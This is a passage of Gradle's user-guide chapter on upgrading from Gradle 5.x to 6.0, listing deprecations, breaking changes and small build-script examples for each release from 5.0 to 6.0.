implied.\n\/\/ See the 
[[upgrading_version_5]]\n= Upgrading your build from Gradle 5.x to 6.0\n\nThis chapter provides the information you need to migrate your Gradle 5.x builds to Gradle 6.0. For migrating from Gradle 4.x, complete the <<upgrading_version_4.adoc#upgrading_version_4, 4.x to 5.0 guide>> first.\n\nWe recommend the following steps for all users:\n\n. Try running `gradle help --scan` and view the https:\/\/gradle.com\/enterprise\/releases\/2018.4\/#identify-usages-of-deprecated-gradle-functionality[deprecations view] of the generated build scan.\n+\nimage::deprecations.png[Deprecations View of a Gradle Build Scan]\n+\nThis is so that you can see any deprecation warnings that apply to your build.\n+\nAlternatively, you could run `gradle help --warning-mode=all` to see the deprecations in the console, though it may not report as much detailed information.\n. Update your plugins.\n+\nSome plugins will break with this new version of Gradle, for example because they use internal APIs that have been removed or changed. The previous step will help you identify potential problems by issuing deprecation warnings when a plugin does try to use a deprecated part of the API.\n+\n. Run `gradle wrapper --gradle-version {gradleVersion}` to update the project to {gradleVersion}.\n. Try to run the project and debug any errors using the <<troubleshooting.adoc#troubleshooting, Troubleshooting Guide>>.\n\n[[changes_6.0]]\n== Upgrading from 5.6 and earlier\n\n=== Deprecations\n\n==== Dependencies should no longer be declared using the compile and runtime configurations\n\nThe usage of the `compile` and `runtime` configurations in the Java ecosystem plugins has been discouraged for some time now.\nThese configurations, and their counterparts in other source sets (e.g. `testCompile` and `testRuntime`), should not be utilised anymore.\nInstead, use the `implementation`, `api`, `compileOnly` and `runtimeOnly` configurations to declare dependencies and the `compileClasspath` and `runtimeClasspath` configurations to resolve dependencies.\n\n==== Local build cache type shouldn't be specified\n\nWhen configuring the local build cache, the use of `BuildCacheConfiguration.local(Class)` and `local(Class, Action)` has now been deprecated; use `getLocal()` or `local(Action)` instead.\nThese methods now assume the local build cache type to be `DirectoryBuildCache`.\n\n==== `IncrementalTaskInputs` has been deprecated\n\nIn Gradle 5.4 we introduced a new API for implementing <<custom_tasks.adoc#incremental_tasks,incremental tasks>>: link:{groovyDslPath}\/org.gradle.work.InputChanges.html[InputChanges].\nIts predecessor `IncrementalTaskInputs` has been deprecated.\n\n==== Forced dependencies\n\nForcing dependency versions using `force = true` on a first-level dependency is deprecated.\nForce has both a semantic and ordering issue which can be avoided by using a <<rich_versions.adoc#rich-version-constraints, strict version constraint>>.\n\n==== Invalid task definitions and configurations\n\nProblems with task definitions are called out in deprecation warnings like this:\n\n```\nProperty 'options.configFile' is not annotated with an input or output annotation. This behaviour has been deprecated and is scheduled to be removed in Gradle 7.0.\n```\n\n
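Such a warning typically goes away once the property carries an appropriate annotation (a sketch; the task and property names are illustrative):\n\n```\nclass MyTask extends DefaultTask {\n    \/\/ annotated, so Gradle can track the file for up-to-date checks and caching\n    @InputFile\n    File configFile\n}\n```\n\n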
==== Search upwards related API in `StartParameter` has been deprecated\n\nIn Gradle 5.0 we removed the `--no-search-upward` CLI parameter.\nThe related APIs in `StartParameter` are now deprecated.\n\n==== `BuildListener#buildStarted` and `Gradle#buildStarted` have been deprecated\n\nThese methods currently do not work as expected.\nThey are being deprecated to avoid confusion.\n\n=== Potential breaking changes\n\n==== Android Gradle Plugin 3.3 and earlier is not supported anymore\n\nGradle 6.0 supports Android Gradle Plugin versions 3.4 and later.\n\n==== Archive tasks fail on duplicate files\n\nUntil now archive tasks defaulted to the `INCLUDE` duplicates strategy, allowing the same path to exist multiple times in an archive.\n\nIn Gradle 6.0 we are switching to `FAIL`, prohibiting duplicate files in archives.\nIf you still want to allow them, you can specify that explicitly:\n\n```\ntask archive(type: Zip) {\n    duplicatesStrategy = DuplicatesStrategy.INCLUDE \/\/ allow duplicates\n    archiveName = 'archive.zip'\n    from 'src'\n}\n```\n\n*Note* that `Copy` and `Sync` tasks are unaffected: they still use the `INCLUDE` duplicates strategy as default.\n\n==== Local build cache is always a directory cache\n\nIn the past it was possible to use any build cache implementation as the `local` cache.\nThis is not allowed anymore as the local cache is always a `DirectoryBuildCache`.\nCalls to `BuildCacheConfiguration.local(Class)` with anything other than `DirectoryBuildCache` as the type will fail the build.\nCalling these methods with the `DirectoryBuildCache` type will produce a deprecation warning.\nUse `getLocal()` and `local(Action)` instead, respectively.\nThese methods now assume the local build cache type to be `DirectoryBuildCache`.\n\n==== Failing to pack or unpack cached results will now fail the build\n\nIn the past when Gradle encountered a problem while packaging the results of a cached task, it would ignore the problem and try to continue running the build.\nSimilarly, having encountered a corrupt cached artifact during unpacking Gradle would try to remove whatever was already unpacked of the output and re-execute the task to make sure the build had a chance to succeed.\n\nWhile this behavior could be helpful for keeping the build running no matter what, hiding the problems this way can lead to reduced cache performance.\nIn Gradle 6.0 we are switching to failing fast, and both pack and unpack errors will cause the build to fail.\nDoing so allows these problems to be surfaced more easily.\n\n==== Gradle Module Metadata is always published\n\nlink:https:\/\/blog.gradle.org\/gradle-metadata-1.0[Gradle Module Metadata], officially introduced in Gradle 5.3, was created to solve many of the problems that have plagued dependency management for years, in particular, but not exclusively, in the Java ecosystem.\nWith Gradle 6.0, Gradle Module Metadata is enabled by default.\nThis means, if you are publishing libraries with Gradle, using the <<publishing_maven.adoc#,maven-publish>> or <<publishing_ivy.adoc#,ivy-publish>> plugin, the Gradle Module Metadata file is always published *in addition* to the traditional metadata.\nThe traditional metadata file will contain a marker so that Gradle knows that there is additional metadata to consume.\n\n==== Maven or Ivy repositories are no longer queried for artifacts without metadata by default\n\nIf Gradle fails to locate the metadata file (`.pom` or `ivy.xml`) of a module in a repository defined in the `repositories { }` section, it now assumes that the module does not exist in that repository.\nSimilarly, for dynamic versions, the `metadata.xml` for the corresponding module needs to be present in a Maven repository.\nPreviously, Gradle was also looking for a default artifact (`.jar`), which usually does not exist.\nThis often caused a large number of unnecessary requests when using multiple repositories.\nThis change speeds up builds with many dependencies using multiple repositories.\nYou can opt into the previous behavior for selected repositories by adding the `artifact()` <<declaring_repositories.adoc#sec:supported_metadata_sources,metadata source>>.\n\n
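For example, to keep probing one specific repository for plain artifacts, the previous behavior can be restored per repository (a sketch; the URL is illustrative):\n\n```\nrepositories {\n    maven {\n        url 'https:\/\/repo.example.com\/releases'\n        metadataSources {\n            mavenPom()\n            artifact() \/\/ also accept modules that only publish a jar\n        }\n    }\n}\n```\n\n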
==== buildSrc classes are no longer visible from settings scripts\n\nPreviously, the buildSrc project was built before applying the project's settings script and its classes were visible within the script.\nNow, buildSrc is built after the settings script and its classes are not visible to it.\nThe buildSrc classes remain visible to project build scripts and script plugins.\n\nCustom logic can be used from a settings script by <<tutorial_using_tasks.adoc#sec:build_script_external_dependencies, declaring external dependencies>>.\n\n==== `@Nullable` annotation is gone\n\nThe `org.gradle.api.Nullable` annotation type has been removed. Use `javax.annotation.Nullable` from JSR-305 instead.\n\n==== Plugin validation changes\n\n- The `validateTaskProperties` task is now deprecated; use `validatePlugins` instead.\n  The new name better reflects the fact that it also validates artifact transform parameters and other non-property definitions.\n- The `ValidateTaskProperties` type is replaced by `ValidatePlugins`.\n- The `setClasses()` method is now removed. Use `getClasses().setFrom()` instead.\n- The `setClasspath()` method is also removed. Use `getClasspath().setFrom()` instead.\n- The link:{javadocPath}\/org\/gradle\/plugin\/devel\/tasks\/ValidatePlugins.html#getFailOnWarning--[failOnWarning] option is now enabled by default.\n- The following task validation errors now fail the build at runtime and are promoted to errors for link:{javadocPath}\/org\/gradle\/plugin\/devel\/tasks\/ValidatePlugins.html[ValidatePlugins]:\n  * A task property is annotated with a property annotation not allowed for tasks, like `@InputArtifact`.\n\n==== `DefaultTask` and `ProjectLayout` methods replaced with `ObjectFactory`\n\nUse `ObjectFactory.fileProperty()` instead of the following methods that are now removed:\n\n- `DefaultTask.newInputFile()`\n- `DefaultTask.newOutputFile()`\n- `ProjectLayout.fileProperty()`\n\nUse `ObjectFactory.directoryProperty()` instead of the following methods that are now removed:\n\n- `DefaultTask.newInputDirectory()`\n- `DefaultTask.newOutputDirectory()`\n- `ProjectLayout.directoryProperty()`\n\n==== The FindBugs plugin has been removed\n\nThe deprecated FindBugs plugin has been removed.\nAs an alternative, you can use the link:https:\/\/plugins.gradle.org\/plugin\/com.github.spotbugs[SpotBugs plugin] from the link:https:\/\/plugins.gradle.org[Gradle Plugin Portal].\n\n==== The JDepend plugin has been removed\n\nThe deprecated JDepend plugin has been removed.\nThere are a number of community-provided plugins for code and architecture analysis available on the link:https:\/\/plugins.gradle.org[Gradle Plugin Portal].\n\n==== The OSGI plugin has been removed\n\nThe deprecated OSGI plugin has been removed. There are a number of community-provided OSGI plugins available on the link:https:\/\/plugins.gradle.org[Gradle Plugin Portal].\n\n
==== The announce and build-announcements plugins have been removed\n\nThe deprecated announce and build-announcements plugins have been removed. There are a number of community-provided plugins for sending out notifications available on the link:https:\/\/plugins.gradle.org[Gradle Plugin Portal].\n\n==== The Compare Gradle Builds plugin has been removed\n\nThe deprecated Compare Gradle Builds plugin has been removed.\nPlease use https:\/\/scans.gradle.com\/[build scans] for build analysis and comparison.\n\n==== Changes to the task container\n\nThe following deprecated methods on the task container now result in errors:\n\n- `TaskContainer.add()`\n- `TaskContainer.addAll()`\n- `TaskContainer.remove()`\n- `TaskContainer.removeAll()`\n- `TaskContainer.retainAll()`\n- `TaskContainer.clear()`\n- `TaskContainer.iterator().remove()`\n\nAdditionally, the following deprecated functionality now results in an error:\n\n- Replacing a task that has already been realized.\n- Replacing a registered (unrealized) task with an incompatible type. A compatible type is the same type or a sub-type of the registered type.\n- Replacing a task that has never been registered.\n\n==== `AbstractCompile.compile()` is gone\n\nThe abstract method `compile()` is no longer declared by `AbstractCompile`.\nTasks extending `AbstractCompile` can implement their own `@TaskAction` method with the name of their choosing.\nThey are also free to add a `@TaskAction` method with an `InputChanges` parameter without having to implement a parameter-less one as well.\n\n==== Using the `embedded-kotlin` plugin now requires a repository\n\nJust like when using the `kotlin-dsl` plugin, it is now required to declare a repository where Kotlin dependencies can be found if you apply the `embedded-kotlin` plugin.\n\n```kotlin\nplugins {\n    `embedded-kotlin`\n}\n\nrepositories {\n    jcenter()\n}\n```\n\n==== Kotlin DSL IDE support now requires Kotlin IntelliJ Plugin >= 1.3.50\n\nWith Kotlin IntelliJ plugin versions prior to 1.3.50, Kotlin DSL scripts will be wrongly highlighted when the _Gradle JVM_ is set to a version different from the one in _Project SDK_.\nSimply upgrade your IDE plugin to a version >= 1.3.50 to restore the correct Kotlin DSL script highlighting behavior.\n\n==== Updates to bundled Gradle dependencies\n\n- Groovy has been updated to http:\/\/groovy-lang.org\/changelogs\/changelog-2.5.8.html[Groovy 2.5.8].\n- Kotlin has been updated to https:\/\/blog.jetbrains.com\/kotlin\/2019\/08\/kotlin-1-3-50-released\/[Kotlin 1.3.50].\n\n==== Updates to default integration versions\n\n- Checkstyle has been updated to https:\/\/checkstyle.org\/releasenotes.html#Release_8.24[Checkstyle 8.24].\n- CodeNarc has been updated to https:\/\/github.com\/CodeNarc\/CodeNarc\/blob\/master\/CHANGELOG.md#version-14---may-2019[CodeNarc 1.4].\n- PMD has been updated to https:\/\/pmd.github.io\/latest\/pmd_release_notes.html#28-july-2019---6170[PMD 6.17.0].\n\n==== Javadoc and Groovydoc don't include timestamps by default\n\nTimestamps in the generated documentation have very limited practical use; however, they make it impossible to have repeatable documentation builds.\nTherefore, the `Javadoc` and `Groovydoc` tasks are now configured to not include timestamps by default any more.\n\n==== User provided 'config_loc' properties are ignored by Checkstyle\n\nGradle always uses `configDirectory` as the value for 'config_loc' when running Checkstyle.\n\n
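If your build relied on a custom 'config_loc' value, point `configDirectory` at that location instead (a sketch; the path is illustrative):\n\n```\ncheckstyle {\n    \/\/ exposed to the Checkstyle ruleset as ${config_loc}\n    configDirectory = file('config\/checkstyle')\n}\n```\n\n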
==== Changing the pom packaging no longer changes the artifact extension\n\nPreviously, the extension of the main artifact published to a Maven repository, typically a _jar_, was changed during publishing if the pom packaging was not _jar_, _ejb_, _bundle_ or _maven-plugin_.\nThis behavior led to broken Gradle Module Metadata and was difficult to understand due to different handling of different packaging types.\nBuild authors can change the artifact name when the artifact is created to obtain the same result as before - e.g. by setting `jar.archiveExtension.set(pomPackaging)`.\n\n==== Ivy.xml published for Java libraries contains more information\n\nA number of fixes were made to produce more correct `ivy.xml` metadata in the `ivy-publish` plugin.\nAs a consequence, the internal structure of the `ivy.xml` file has changed.\nHowever, selecting the `default` configuration yields the same result as before.\nOnly the `runtime` configuration now contains more information which corresponds to the _runtimeElements_ variant of a Java library.\nIn general, users are advised to migrate from `ivy.xml` to the new Gradle Module Metadata format.\n\n==== Executing Gradle without a settings file has been deprecated\n\nA Gradle build is defined by a `settings.gradle[.kts]` file in the current or parent directory.\nWithout a settings file, a Gradle build is undefined and will emit a deprecation warning.\n\nIn Gradle 7.0, Gradle will only allow you to invoke the `init` task or diagnostic command line flags, such as `--version`, with undefined builds.\n\n==== Calling afterEvaluate on an evaluated project has been deprecated\n\nOnce a project is evaluated, Gradle ignores all configuration passed to `Project#afterEvaluate`.\nTo avoid confusion, this scenario will become an error in Gradle 7.0.\nUntil then, a deprecation warning will be shown.\n\n==== Miscellaneous\n\nThe following breaking changes will appear as deprecation warnings with Gradle 5.6:\n\n* The `org.gradle.util.GUtil.savePropertiesNoDateComment` method has been removed. 
There is no public replacement for this internal method.\n* The deprecated class `org.gradle.api.tasks.compile.CompilerArgumentProvider` has been removed.\n Use link:{javadocPath}\/org\/gradle\/process\/CommandLineArgumentProvider.html[org.gradle.process.CommandLineArgumentProvider] instead.\n* The deprecated class `org.gradle.api.ConventionProperty` has been removed.\n Use link:{javadocPath}\/org\/gradle\/api\/provider\/Provider.html[Providers] instead of convention properties.\n* The deprecated class `org.gradle.reporting.DurationFormatter` has been removed.\n* The bridge method `org.gradle.api.tasks.TaskInputs.property(String name, @Nullable Object value)` returning `TaskInputs` has been removed.\n A plugin using the method must be compiled with Gradle 4.3 to work on Gradle 6.0.\n* The following setters have been removed from `JacocoReportBase`:\n** link:{groovyDslPath}\/org.gradle.testing.jacoco.tasks.JacocoReport.html#org.gradle.testing.jacoco.tasks.JacocoReport:executionData[executionData] - use `getExecutionData().setFrom()` instead.\n** link:{groovyDslPath}\/org.gradle.testing.jacoco.tasks.JacocoReport.html#org.gradle.testing.jacoco.tasks.JacocoReport:sourceDirectories[sourceDirectories] - use `getSourceDirectories().setFrom()` instead.\n** link:{groovyDslPath}\/org.gradle.testing.jacoco.tasks.JacocoReport.html#org.gradle.testing.jacoco.tasks.JacocoReport:classDirectories[classDirectories] - use `getClassDirectories().setFrom()` instead.\n** link:{groovyDslPath}\/org.gradle.testing.jacoco.tasks.JacocoReport.html#org.gradle.testing.jacoco.tasks.JacocoReport:additionalClassDirs[additionalClassDirs] - use `getAdditionalClassDirs().setFrom()` instead.\n** link:{groovyDslPath}\/org.gradle.testing.jacoco.tasks.JacocoReport.html#org.gradle.testing.jacoco.tasks.JacocoReport:additionalSourceDirs[additionalSourceDirs] - use `getAdditionalSourceDirs().setFrom()` instead.\n* The `append` property on `JacocoTaskExtension` has been removed.\n `append` is now always configured to be true for the Jacoco agent.\n* The `configureDefaultOutputPathForJacocoMerge` method on `JacocoPlugin` has been removed.\n The method was never meant to be public.\n* File paths in link:{javadocPath}\/org\/gradle\/plugins\/ear\/descriptor\/DeploymentDescriptor.html#getFileName--[deployment descriptor file name] for the ear plugin are not allowed any more.\n Use a simple name, like `application.xml`, instead.\n* The `org.gradle.testfixtures.ProjectBuilder` constructor has been removed. 
Please use `ProjectBuilder.builder()` instead.\n* When <<groovy_plugin.adoc#sec:incremental_groovy_compilation,incremental Groovy compilation>> is enabled, a wrong configuration of the source roots or enabling Java annotation processing for Groovy now fails the build.\n  Disable incremental Groovy compilation when you want to compile in those cases.\n* `ComponentSelectionRule` can no longer inject the metadata or ivy descriptor.\n  Use the methods on the <<declaring_dependency_versions.adoc#sec:component_selection_rules,`ComponentSelection` parameter>> instead.\n* Declaring an <<custom_tasks.adoc#incremental_tasks,incremental task>> without declaring outputs is now an error.\n  Declare file outputs or use link:{javadocPath}\/org\/gradle\/api\/tasks\/TaskOutputs.html#upToDateWhen-groovy.lang.Closure-[TaskOutputs.upToDateWhen()] instead.\n* The `getEffectiveAnnotationProcessorPath()` method is removed from the `JavaCompile` and `ScalaCompile` tasks.\n* Changing the value of a task property with type `Property<T>` after the task has started execution now results in an error.\n* The `isLegacyLayout()` method is removed from `SourceSetOutput`.\n* The map returned by `TaskInputs.getProperties()` is now unmodifiable.\n  Trying to modify it will result in an `UnsupportedOperationException` being thrown.\n\n[[changes_5.6]]\n== Upgrading from 5.5 and earlier\n\n=== Deprecations\n\n==== Changing the contents of `ConfigurableFileCollection` task properties after task starts execution\n\nWhen a task property has type `ConfigurableFileCollection`, then the file collection referenced by the property will ignore changes made to the contents of the collection once the task\nstarts execution. This has two benefits. Firstly, this prevents accidental changes to the property value during task execution which can cause Gradle's up-to-date checks and build cache lookups\nto use different values from those used by the task action. Secondly, this improves performance as Gradle can calculate the value once and cache the result.\n\nThis will become an error in Gradle 6.0.\n\n==== Creating `SignOperation` instances\n\nCreating `SignOperation` instances directly is now deprecated. Instead, the methods of `SigningExtension` should be used to create these instances.\n\nThis will become an error in Gradle 6.0.\n\n==== Declaring an incremental task without outputs\n\nDeclaring an <<custom_tasks.adoc#incremental_tasks,incremental task>> without declaring outputs is now deprecated.\nDeclare file outputs or use link:{javadocPath}\/org\/gradle\/api\/tasks\/TaskOutputs.html#upToDateWhen-groovy.lang.Closure-[TaskOutputs.upToDateWhen()] instead.\n\nThis will become an error in Gradle 6.0.\n\n==== `WorkerExecutor.submit()` is deprecated\n\nThe `WorkerExecutor.submit()` method is now deprecated.\nThe new `noIsolation()`, `classLoaderIsolation()` and `processIsolation()` methods should now be used to submit work.\nSee <<custom_tasks.adoc#using-the-worker-api, the userguide>> for more information on using these methods.\n\n`WorkerExecutor.submit()` will be removed in Gradle 7.0.\n\n=== Potential breaking changes\n\n==== Task dependencies are honored for task `@Input` properties whose value is a `Property`\n\nPreviously, task dependencies would be ignored for task `@Input` properties of type `Property<T>`. These are now honored, so that it is possible to attach a task output property to a task `@Input` property.\n\nThis may introduce unexpected cycles in the task dependency graph, where the value of an output property is mapped to produce a value for an input property.\n\n
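Wiring an output to an input now carries the task dependency implicitly (a minimal sketch; `ProducerTask` and `ConsumerTask` are hypothetical task types):\n\n```\ndef producer = tasks.register('producer', ProducerTask)\n\ntasks.register('consumer', ConsumerTask) {\n    \/\/ `label` is an @Input Property<String>; the dependency on `producer` is created automatically\n    label = producer.flatMap { it.outputFile }.map { it.asFile.name }\n}\n```\n\n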
==== Declaring task dependencies using a file `Provider` that does not represent a task output\n\nPreviously, it was possible to pass `Task.dependsOn()` a `Provider<File>`, `Provider<RegularFile>` or `Provider<Directory>` instance that did not represent a task output. These providers would be silently ignored.\n\nThis is now an error because Gradle does not know how to build files that are not task outputs.\n\n*Note* that it is still possible to pass `Task.dependsOn()` a `Provider` that returns a file and that represents a task output, for example `myTask.dependsOn(jar.archiveFile)` or `myTask.dependsOn(taskProvider.flatMap { it.outputDirectory })`, when the `Provider` is an annotated `@OutputFile` or `@OutputDirectory` property of a task.\n\n==== Setting `Property` value to `null` uses the property convention\n\nPreviously, calling `Property.set(null)` would always reset the value of the property to 'not defined'. Now, the convention that is associated with the property using the `convention()` method\nwill be used to determine the value of the property.\n\n==== Enhanced validation of names for `publishing.publications` and `publishing.repositories`\n\nThe repository and publication names are used to construct task names for publishing. It was possible to supply a name that would result in an invalid task name. Names for publications and repositories are now restricted to `[A-Za-z0-9_\\\\-.]+`.\n\n==== Restricted Worker API classloader and process classpath\n\nGradle now prevents internal dependencies (like Guava) from leaking into the classpath used by Worker API actions. This fixes link:https:\/\/github.com\/gradle\/gradle\/issues\/3698[an issue] where a worker needs to use a dependency that is also used by Gradle internally.\n\nIn previous releases, it was possible to rely on these leaked classes. Plugins relying on this behavior will now fail. To fix the plugin, the worker should explicitly include all required dependencies in its classpath.\n\n==== Default PMD version upgraded to 6.15.0\n\n<<pmd_plugin#pmd_plugin, The PMD plugin>> has been upgraded to use link:https:\/\/pmd.github.io\/pmd-6.15.0\/pmd_release_notes.html[PMD version 6.15.0] instead of 6.8.0 by default.\n\nContributed by link:https:\/\/github.com\/wreulicke[wreulicke]\n\n==== Configuration copies have unique names\n\nPreviously, all copies of a configuration always had the name `<OriginConfigurationName>Copy`. Now when creating multiple copies, each will have a unique name by adding an index starting from the second copy (e.g. `CompileOnlyCopy2`).\n\n==== Changed classpath filtering for Eclipse\n\nGradle 5.6 no longer supplies custom classpath attributes in the Eclipse model. Instead, it provides the attributes for link:https:\/\/www.eclipse.org\/eclipse\/news\/4.8\/jdt.php#jdt-test-sources[Eclipse test sources]. This change requires Buildship version 3.1.1 or later.\n\n
==== Embedded Kotlin upgraded to 1.3.41\n\nGradle Kotlin DSL scripts and Gradle Plugins authored using the `kotlin-dsl` plugin are now compiled using Kotlin 1.3.41.\n\nPlease see the Kotlin link:https:\/\/blog.jetbrains.com\/kotlin\/2019\/06\/kotlin-1-3-40-released\/[blog post] and link:https:\/\/github.com\/JetBrains\/kotlin\/blob\/1.3.40\/ChangeLog.md[changelog] for more information about the included changes.\n\nThe minimum supported Kotlin Gradle Plugin version is now 1.2.31. Previously it was 1.2.21.\n\n==== Automatic capability conflict resolution\n\nPrevious versions of Gradle would automatically select, in case of capability conflicts, the module which has the highest capability version.\nStarting from 5.6, this is an opt-in behavior that can be activated using:\n\n```\nconfigurations.all {\n    resolutionStrategy.capabilitiesResolution.all { selectHighestVersion() }\n}\n```\n\nSee <<controlling_transitive_dependencies.adoc#sub:capabilities, the capabilities section of the documentation>> for more options.\n\n==== File removal operations don't follow symlinked directories\n\nWhen Gradle has to remove the output files of a task for various reasons, it will not follow symlinked directories.\nThe symlink itself will be deleted, but the contents of the linked directory will stay intact.\n\n==== Disabled debug argument parsing in JavaExec\n\nGradle 5.6 introduced a new DSL element (`JavaForkOptions.debugOptions(Action<JavaDebugOptions>)`) to configure debug properties for forked Java processes. Due to this change, Gradle no longer parses debug-related JVM arguments. Consequently, `JavaForkOptions.getDebug()` no longer returns `true` if the `-Xrunjdwp:transport=dt_socket,server=y,suspend=y,address=5005` or the `-agentlib:jdwp=transport=dt_socket,server=y,suspend=y,address=5005` argument is specified to the process.\n\n==== Scala 2.9 and Zinc compiler\n\nGradle no longer supports building applications using Scala 2.9.\nThe Zinc compiler has been upgraded to 1.2.5 and requires Scala 2.10.\n\n[[changes_5.5]]\n== Upgrading from 5.4 and earlier\n\n=== Deprecations\n\n==== Play\n\nThe built-in <<play_plugin.adoc#play_plugin, Play plugin>> has been deprecated and will be replaced by a new link:https:\/\/gradle.github.io\/playframework[Play Framework plugin] available from the plugin portal.\n\n==== Build Comparison\n\nThe _build comparison_ plugin has been deprecated and will be removed in the next major version of Gradle.\n\nlink:https:\/\/gradle.com\/build-scans[Build scans] show much deeper insights into your build and you can use link:https:\/\/gradle.com\/[Gradle Enterprise] to directly compare two builds' build scans.\n\n=== Potential breaking changes\n\n==== User supplied Eclipse project names may be ignored on conflict\n\nProject names configured via link:{javadocPath}\/org\/gradle\/plugins\/ide\/eclipse\/model\/EclipseProject.html[`EclipseProject.setName(...)`] were honored by Gradle and Buildship in all cases, even\nwhen the names caused conflicts and import\/synchronization errors.\n\nGradle can now deduplicate these names if they conflict with other project names in an Eclipse workspace. 
This may lead to different Eclipse project names for projects with user-specified names.\n\nThe upcoming 3.1.1 version of Buildship is required to take advantage of this behavior.\n\nContributed by link:https:\/\/github.com\/fraenkelc[Christian Fr\u00e4nkel]\n\n==== Default JaCoCo version upgraded to 0.8.4\n\n<<jacoco_plugin#jacoco_plugin, The JaCoCo plugin>> has been upgraded to use link:http:\/\/www.jacoco.org\/jacoco\/trunk\/doc\/changes.html[JaCoCo version 0.8.4] instead of 0.8.3 by default.\n\nContributed by link:https:\/\/github.com\/Godin[Evgeny Mandrikov]\n\n==== Embedded Ant version upgraded to 1.9.14\n\nThe version of Ant distributed with Gradle has been upgraded to link:https:\/\/archive.apache.org\/dist\/ant\/RELEASE-NOTES-1.9.14.html[1.9.14] from 1.9.13.\n\n==== `DependencyHandler` now statically exposes `ExtensionAware`\n\nThis affects Kotlin DSL build scripts that make use of `ExtensionAware` extension members such as the `extra` properties accessor inside the `dependencies {}` block. The receiver for those members will no longer be the enclosing `Project` instance but the `dependencies` object itself, the innermost `ExtensionAware` conforming receiver. In order to address `Project` extra properties inside `dependencies {}` the receiver must be explicitly qualified i.e. `project.extra` instead of just `extra`. Affected extensions also include `the<T>()` and `configure<T>(T.() -> Unit)`.\n\n==== Improved processing of dependency excludes\n\nPrevious versions of Gradle could, in some complex dependency graphs, have a wrong result or a randomized dependency order when lots of excludes were present.\nTo mitigate this, the algorithm that computes exclusions has been rewritten.\nIn some rare cases this may cause some differences in resolution, due to the correctness changes.\n\n==== Improved classpath separation for worker processes\n\nThe system classpath for worker daemons started by the <<custom_tasks.adoc#worker_api, Worker API>> when using `PROCESS` isolation has been reduced to a minimum set of Gradle infrastructure. User code is still segregated into a separate classloader to isolate it from the Gradle runtime. This should be a transparent change for tasks using the worker API, but previous versions of Gradle mixed user code and Gradle internals in the worker process. 
Worker actions that rely on things like the `java.class.path` system property may be affected, since `java.class.path` now represents only the classpath of the Gradle internals.\n\n[[changes_5.4]]\n== Upgrading from 5.3 and earlier\n\n=== Deprecations\n\n==== Using custom local build cache implementations\n\nUsing a custom build cache implementation for the local build cache is now deprecated.\nThe only allowed type will be `DirectoryBuildCache` going forward.\nThere is no change in the support for using custom build cache implementations as the remote build cache.\n\n=== Potential breaking changes\n\n==== Use HTTPS when configuring Google Hosted Libraries via `googleApis()`\n\nThe Google Hosted Libraries URL accessible via `JavaScriptRepositoriesExtension#GOOGLE_APIS_REPO_URL` was changed to use the HTTPS protocol.\nThe change also affects the Ivy repository configured via `googleApis()`.\n\n[[changes_5.3]]\n== Upgrading from 5.2 and earlier\n\n=== Potential breaking changes\n\n==== Bug fixes in platform resolution\n\nThere was a bug from Gradle 5.0 to 5.2.1 (included) where enforced platforms would potentially include dependencies instead of constraints.\nThis would happen whenever a POM file defined both dependencies and \"constraints\" (via `<dependencyManagement>`) and you used `enforcedPlatform`.\nGradle 5.3 fixes this bug, meaning that you might have differences in the resolution result if you relied on this broken behavior.\nSimilarly, Gradle 5.3 will no longer try to download jars for `platform` and `enforcedPlatform` dependencies (as they should only bring in constraints).\n\n==== Automatic target JVM version\n\nIf you apply any of the Java plugins, Gradle will now do its best to select dependencies which match the target compatibility of the module being compiled.\nWhat it means, in practice, is that if you have module A built for Java 8, and module B built for Java 8, then there's no change.\nHowever, if B is built for Java 9+, then it's not binary compatible anymore, and Gradle would complain with an error message like the following:\n\n```\nUnable to find a matching variant of project :producer:\n  - Variant 'apiElements' capability test:producer:unspecified:\n      - Required org.gradle.dependency.bundling 'external' and found compatible value 'external'.\n      - Required org.gradle.jvm.version '8' and found incompatible value '9'.\n      - Required org.gradle.usage 'java-api' and found compatible value 'java-api-jars'.\n  - Variant 'runtimeElements' capability test:producer:unspecified:\n      - Required org.gradle.dependency.bundling 'external' and found compatible value 'external'.\n      - Required org.gradle.jvm.version '8' and found incompatible value '9'.\n      - Required org.gradle.usage 'java-api' and found compatible value 'java-runtime-jars'.\n```\n\nIn general, this is a sign that your project is misconfigured and that your dependencies are not compatible.\nHowever, there are cases where you still may want to do this, for example when only a _subset_ of classes of your module actually need the Java 9 dependencies, and are not intended to be used on earlier releases.\nJava in general doesn't encourage you to do this (you should split your module instead), but if you face this problem, you can work around it by disabling this new behavior on the consumer side:\n\n```\njava {\n    disableAutoTargetJvm()\n}\n```\n\n==== Bug fix in Maven \/ Ivy interoperability with dependency substitution\n\nIf you have a Maven dependency pointing to an Ivy dependency where the `default` configuration dependencies do not match the `compile` + `runtime` + `master` ones,\n_and_ that Ivy dependency was substituted (using a `resolutionStrategy.force`, `resolutionStrategy.eachDependency` or `resolutionStrategy.dependencySubstitution`),\nthen this fix will impact you.\nThe legacy behaviour of Gradle, prior to 5.0, was still in place instead of being replaced by the changes introduced by improved pom support.\n\n
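A substitution of the kind that triggers the fixed code path looks like this (a sketch; the coordinates are illustrative):\n\n```\nconfigurations.all {\n    resolutionStrategy.dependencySubstitution {\n        \/\/ replaces the Ivy module that the Maven dependency points to\n        substitute module('com.example:ivy-lib') with module('com.example:ivy-lib:2.0')\n    }\n}\n```\n\n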
==== Delete operations correctly handle symbolic links on Windows\n\nGradle no longer ignores the `followSymlink` option on Windows for the `clean` task, all `Delete` tasks, and `project.delete {}` operations in the presence of junction points and symbolic links.\n\n==== Fix in publication of additional artifacts\n\nIn previous Gradle versions, additional artifacts registered at the project level were not published by `maven-publish` or `ivy-publish` unless they were also added as artifacts in the publication configuration.\n\nWith Gradle 5.3, these artifacts are now properly accounted for and published.\n\nThis means that artifacts that are registered both on the project _and_ the publication, Ivy or Maven, will cause publication to fail since it will create duplicate entries.\nThe fix is to remove these artifacts from the publication configuration.\n\n[[changes_5.2]]\n== Upgrading from 5.1 and earlier\n\n=== Potential breaking changes\n\nnone\n\n[[changes_5.1]]\n== Upgrading from 5.0 and earlier\n\n=== Deprecations\n\nFollow the API links to learn how to deal with these deprecations (if no extra information is provided here):\n\n * Setters for `classes` and `classpath` on link:{javadocPath}\/org\/gradle\/plugin\/devel\/tasks\/ValidateTaskProperties.html[`ValidateTaskProperties`]\n\n * There should not be setters for lazy properties like link:{javadocPath}\/org\/gradle\/api\/file\/ConfigurableFileCollection.html[`ConfigurableFileCollection`]. Use `setFrom` instead. For example,\n----\n    validateTaskProperties.getClasses().setFrom(fileCollection)\n    validateTaskProperties.getClasspath().setFrom(fileCollection)\n----\n\n=== Potential breaking changes\n\nThe following changes were not previously deprecated:\n\n==== Signing API changes\nInput and 